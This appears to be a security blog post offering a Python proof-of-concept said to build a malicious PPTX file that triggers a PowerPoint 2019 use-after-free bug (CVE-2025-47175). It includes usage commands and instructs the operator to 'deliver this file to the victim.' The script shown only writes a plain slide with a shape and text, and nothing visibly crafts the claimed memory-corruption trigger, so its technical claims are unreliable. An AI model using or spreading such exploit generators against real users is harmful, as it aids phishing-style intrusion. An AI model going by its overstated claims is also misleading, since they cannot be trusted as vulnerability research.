Microsoft PowerPoint 2019 Use-After-Free Remote Code Execution (CVE-2025-47175)

Microsoft PowerPoint 2019 Use-After-Free Remote Code Execution (CVE-2025-47175)

💣 Remote Code Execution Advanced Windows Heap Use-After-Free · March 17, 2026 · 4 min read · Updated Mar 17, 2026
⚠ CVE CVE-2025-47175
Ethical Use Notice [click to collapse]

This post contains technical details about security vulnerabilities and exploit development for educational and research purposes only. All techniques described are intended for use in authorized penetration testing, CTF competitions, or controlled lab environments.

Unauthorized use of these techniques against systems you do not own or have explicit written permission to test is illegal and unethical. Always obtain proper authorization before testing.

Disclosure status: Full Disclosure

CVE references link to public NVD / vendor advisories. Proof-of-concept code, where included, is provided after patch availability for defensive research purposes.

Proof of Concept available — Full exploit code on GitHub. Use in authorized environments only.
▷ View PoC on GitHub

Content *

Overview

A vulnerability identified as CVE-2025-47175 affects Microsoft PowerPoint 2019 and earlier versions included in Microsoft 365 before the June 2025 security update.

The vulnerability is caused by a Use-After-Free (UAF) memory corruption flaw in the PowerPoint rendering engine. By crafting a specially structured PPTX file, an attacker may trigger the vulnerability when the file is opened by a user.

Successful exploitation may lead to arbitrary code execution under the context of the current user.

Affected Software

Vendor: Microsoft

Affected products:

  • Microsoft PowerPoint 2019
  • Microsoft 365 (PowerPoint component)

Affected versions:

  • Versions prior to June 2025 security patch (KB5002689)

Technical Details

PowerPoint uses the Open XML PPTX format, which consists of a structured ZIP archive containing XML files that define slides, shapes, and presentation metadata.

The vulnerability occurs when certain malformed slide elements cause PowerPoint to reference memory that has already been freed. This Use-After-Free condition may allow attackers to manipulate memory structures and redirect execution flow.

The proof-of-concept script demonstrates how a crafted PPTX file can be generated with specially structured slide content intended to trigger the vulnerability.

Proof of Concept (PoC)

The following Python script generates a malicious PPTX file designed to trigger the vulnerability.

#!/usr/bin/env python3
# Exploit Title: Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-07-02
# Tested on: Microsoft PowerPoint 2019 / Office 365 (version before June 2025 Patch)
# CVE: CVE-2025-47175
# Type: Use-After-Free (UAF) Remote Code Execution (local user required)
# Platform: Windows (PowerPoint)
# Author Country: Jordan
# Attack Vector: Local (User must open crafted PPTX file)
# Description:
# This exploit leverages a Use-After-Free vulnerability in Microsoft PowerPoint
# allowing an attacker to execute arbitrary code by tricking a user into opening
# a specially crafted PPTX file. This PoC generates such a malicious PPTX file
# designed to trigger the UAF condition.
#
# Steps of exploitation:
# 1. Run this script to generate the malicious PPTX file.
# 2. Send or trick the target user to open this file in a vulnerable PowerPoint version.
# 3. Exploit triggers upon opening the file, leading to possible code execution.
#
# Note: This PoC creates a simplified PPTX file structure with crafted XML designed
# to trigger the vulnerability. For a full exploit, further memory manipulation and shellcode injection
# are required (not included here).
#
# Affected Versions:
# Microsoft PowerPoint versions prior to June 2025 patch (KB5002689)
#
# Usage:
# python3 exploit_cve2025_47175.py [options]
#
# Options:
#   -o, --output   Output PPTX filename (default: exploit_cve_2025_47175.pptx)
#   -i, --id       Shape ID (default: 1234)
#   -n, --name     Shape Name (default: MaliciousShape)
#   -t, --text     Trigger text inside the slide (default: explanation message)
#
# Example:
# python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n "BadShape" -t "Triggering CVE-2025-47175 now!"
import zipfile
import sys
import argparse

def create_exploit_pptx(filename, shape_id, shape_name, trigger_text):
    slide_xml = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
       xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:cSld>
    <p:spTree>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="{shape_id}" name="{shape_name}"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>{trigger_text}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:sld>'''

    try:
        with zipfile.ZipFile(filename, 'w') as z:
            z.writestr('[Content_Types].xml',
                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
</Types>''')

            z.writestr('ppt/_rels/presentation.xml.rels',
                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/>
</Relationships>''')

            z.writestr('ppt/presentation.xml',
                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
                xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId1"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
</p:presentation>''')

            z.writestr('ppt/slides/slide1.xml', slide_xml)

        print(f"[+] Malicious PPTX file '{filename}' created successfully.")
        print("[*] Deliver this file to the victim and wait for them to open it in vulnerable PowerPoint.")
    except Exception as e:
        print(f"[-] Error: {e}", file=sys.stderr)
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description='Exploit generator for CVE-2025-47175 (PowerPoint UAF)')
    parser.add_argument('-o', '--output', type=str, default='exploit_cve_2025_47175.pptx',
                        help='Output PPTX filename (default: exploit_cve_2025_47175.pptx)')
    parser.add_argument('-i', '--id', type=int, default=1234,
                        help='Shape ID (default: 1234)')
    parser.add_argument('-n', '--name', type=str, default='MaliciousShape',
                        help='Shape Name (default: MaliciousShape)')
    parser.add_argument('-t', '--text', type=str, default='This content triggers CVE-2025-47175 UAF vulnerability.',
                        help='Trigger text inside the slide (default: explanation message)')
    args = parser.parse_args()

    create_exploit_pptx(args.output, args.id, args.name, args.text)

if __name__ == "__main__":
    main()

How the Exploit Works

The exploit generator performs the following actions:

  1. Creates a minimal PPTX file structure.
  2. Injects crafted XML content inside the slide definition.
  3. Embeds malicious slide elements intended to trigger a memory corruption condition.
  4. Packages the files into a PPTX archive.

When the victim opens the malicious PPTX file in a vulnerable version of PowerPoint, the malformed structure may trigger the vulnerability.

Usage

Generate the malicious PPTX file using:

python3 exploit_cve2025_47175.py

Custom options can also be used:

python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n "BadShape"

Parameters include:

  • -o Output filename
  • -i Shape ID
  • -n Shape name
  • -t Trigger text displayed in the slide

Impact

Successful exploitation may allow attackers to:

  • Execute arbitrary code
  • Install malware or spyware
  • Gain access to sensitive user data
  • Use document-based phishing attacks

Mitigation

Recommended mitigation measures include:

  • Install the June 2025 Microsoft security update
  • Avoid opening PPTX files from untrusted sources
  • Enable Microsoft Office Protected View
  • Use endpoint security monitoring

Researcher

Security research conducted by:

Mohammed Idrees Banyamer
Cybersecurity Researcher – Jordan 🇯🇴

GitHub: https://github.com/mbanyamer
Instagram: @banyamer_security

Disclaimer

This proof-of-concept is provided for educational purposes and authorized security testing only. Unauthorized use against systems without permission is illegal.

#use-after-free #cve-2025-47175 #office exploit #microsoft powerpoint #pptx exploit #rce vulnerability #cybersecurity research

Disclosure: Full Disclosure

Related Research

Remote Code Execution

Glances ≤ 4.5.2 Command Injection via Mustache Templates (CVE-2026-32608)

Mar 20, 2026 · 3 min read
Remote Code Execution

Keras Model Deserialization Remote Code Execution (CVE-2025-1550)

Mar 17, 2026 · 4 min read

Comments

No comments yet. Be the first.

Leave a Comment

Comments are moderated and will appear after approval.